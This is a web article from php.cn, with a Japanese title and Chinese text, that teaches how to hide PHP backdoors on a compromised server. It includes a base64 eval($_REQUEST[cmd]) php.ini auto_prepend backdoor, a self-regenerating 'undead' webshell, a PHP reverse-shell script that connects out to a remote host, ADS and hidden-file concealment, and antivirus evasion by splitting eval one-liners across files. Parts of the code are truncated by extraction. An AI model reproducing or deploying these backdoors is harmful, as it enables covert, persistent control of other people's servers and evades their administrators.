PHPでバックドアを隠す方法

藏色散人
リリース: 2023-03-03 09:50:02
オリジナル
3581 人が閲覧しました

php隐藏后门的方法:1、创建系统隐藏文件;2、利用ADS隐藏文件;3、在php环境变量中留shell;4、设置不死马;5、设置“php.ini”后门;6、将关键字拆分,并进行多文件包含;7、将真正的一句话写入数据库。

PHPでバックドアを隠す方法

推荐:《PHP教程

php 后门隐藏技巧

1. attrib +s +h

创建系统隐藏文件:

attrib +s +a +r +h

attrib +s +h 文件名

PHPでバックドアを隠す方法

在 Windows 10下即使开启了显示隐藏的项目,或dir仍然看不见。

2. 利用 ADS 隐藏文件

NTFS交换数据流(Alternate Data Streams,简称 ADS)是 NTFS 磁盘格式的一个特性,在 NTFS文件系统下,每个文件都可以存在多个数据流。通俗的理解,就是其它文件可以“寄宿”在某个文件身上,而在资源管理器中却只能看到宿主文件,找不到寄宿文件。利用ADS 数据流,我们可以做很多有趣的事情。(抄的)

首先创建 ADS 隐藏文件

在命令行,echo 一个数据流进去,比如 index 文件是正常文件。

echo ^ > index.php:shell.jpg
ログイン後にコピー

这样就生成了一个不可见的 index.php:shell.jpg

PHPでバックドアを隠す方法

使用dir /r查看

PHPでバックドアを隠す方法

可使用命令直接修改,要删除的话 直接删除 index.php就ok了

第二步,直接使用正常文件包含。

PHPでバックドアを隠す方法

做一些免杀

把 index.php:shell.jpg hex 编码

ログイン後にコピー

3.php环境变量留shell

在c盘创建这个目录

PHPでバックドアを隠す方法

丢个图片一句话

PHPでバックドアを隠す方法

然后文件包含,就好。为了隐蔽可以包含图片马,txt等。

PHPでバックドアを隠す方法

4.不死马

运行后,会删除自身,生成一个 webshell.php,管理员删除后还会生成。

'); sleep(5); }
ログイン後にコピー

解决覆盖重写或者重启 web 服务删掉即可。


        
ログイン後にコピー

五. php.ini后门

将下面后门写入php.ini

allow_url_include=On auto_prepend_file="data:;base64,PD9waHAgQGV2YWwoJF9SRVFVRVNUW2NtZF0pOz8+" // base64  // 后门类型可自己修改。
ログイン後にコピー

这些做好后,重启 web 服务就好了。

方法1. 如果权限很大的话,自己手动重启,缺点容易暴露,重启服务,就要上服务器,某里的服务器,异地登陆有短信提醒。

方法2.就是加载一个 php_socke.php 脚本,让他重新加载 php.ini

此后门,任何php都可菜刀连接

'c:\\windows\\system32');} $descriptorspec=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"),); $host=gethostbyname($host); $proto=getprotobyname("tcp"); if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){die("Socket创建失败");} if(($ret=@socket_connect($sock,$host,$port))<0){die("连接失败");} else{ $message="PHP反弹连接\n"; @socket_write($sock,$message,strlen($message)); $cwd=str_replace('\\','/',dirname(__FILE__)); while($cmd=@socket_read($sock,65535,$proto)) { if(trim(strtolower($cmd))=="exit"){ socket_write($sock,"Bye\n");exit; }else{ $process=proc_open($cmd,$descriptorspec,$pipes,$cwd,$env); if(is_resource($process)){ fwrite($pipes[0],$cmd); fclose($pipes[0]); $msg=stream_get_contents($pipes[1]); socket_write($sock,$msg,strlen($msg)); fclose($pipes[1]); $msg=stream_get_contents($pipes[2]); socket_write($sock,$msg,strlen($msg)); $return_value=proc_close($process); } } } } } ?> //此脚本非百分百成功
ログイン後にコピー

6. 关键字拆分,多文件包含!

比如一句话:@eval($_POST['x']);我们可以写成$a=$_POST['x'];@eval($a);

我们可以将 $a=$_POST['x'];写入一个文件 POST.php

然后在 @eval($a); 一句话的上方使用 include "POST.php";的方式引用!

PHPでバックドアを隠す方法

7.将真正的一句话写入数据库

当我们发现源码有个地方执行了数据库操作,那我们就可以改源码和数据库啦~

比如,修改成 eval(查出的数据);

PHPでバックドアを隠す方法

8.以下是linux的

无意中发现的。具体看代码。

ログイン後にコピー

生成一个文件。

在目录下看到是显示 名字为 guige.jpg

但是 web 浏览 却发现 没有找到 guige.jpg 后来发现 需要添 guige.jpg%09.php 这样

的话就导致我们可以对后门隐藏了。。管理员看到的是.jpg 我们却可以 web 用.php 解析来

连接。。。有用的到的可以看看。

以上がPHPでバックドアを隠す方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

関連ラベル:
php
ソース:php.cn
このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
最新のダウンロード
詳細>
ウェブエフェクト
公式サイト
サイト素材
フロントエンドテンプレート
私たちについて 免責事項 Sitemap
PHP中国語ウェブサイト:福祉オンライン PHP トレーニング,PHP 学習者の迅速な成長を支援します!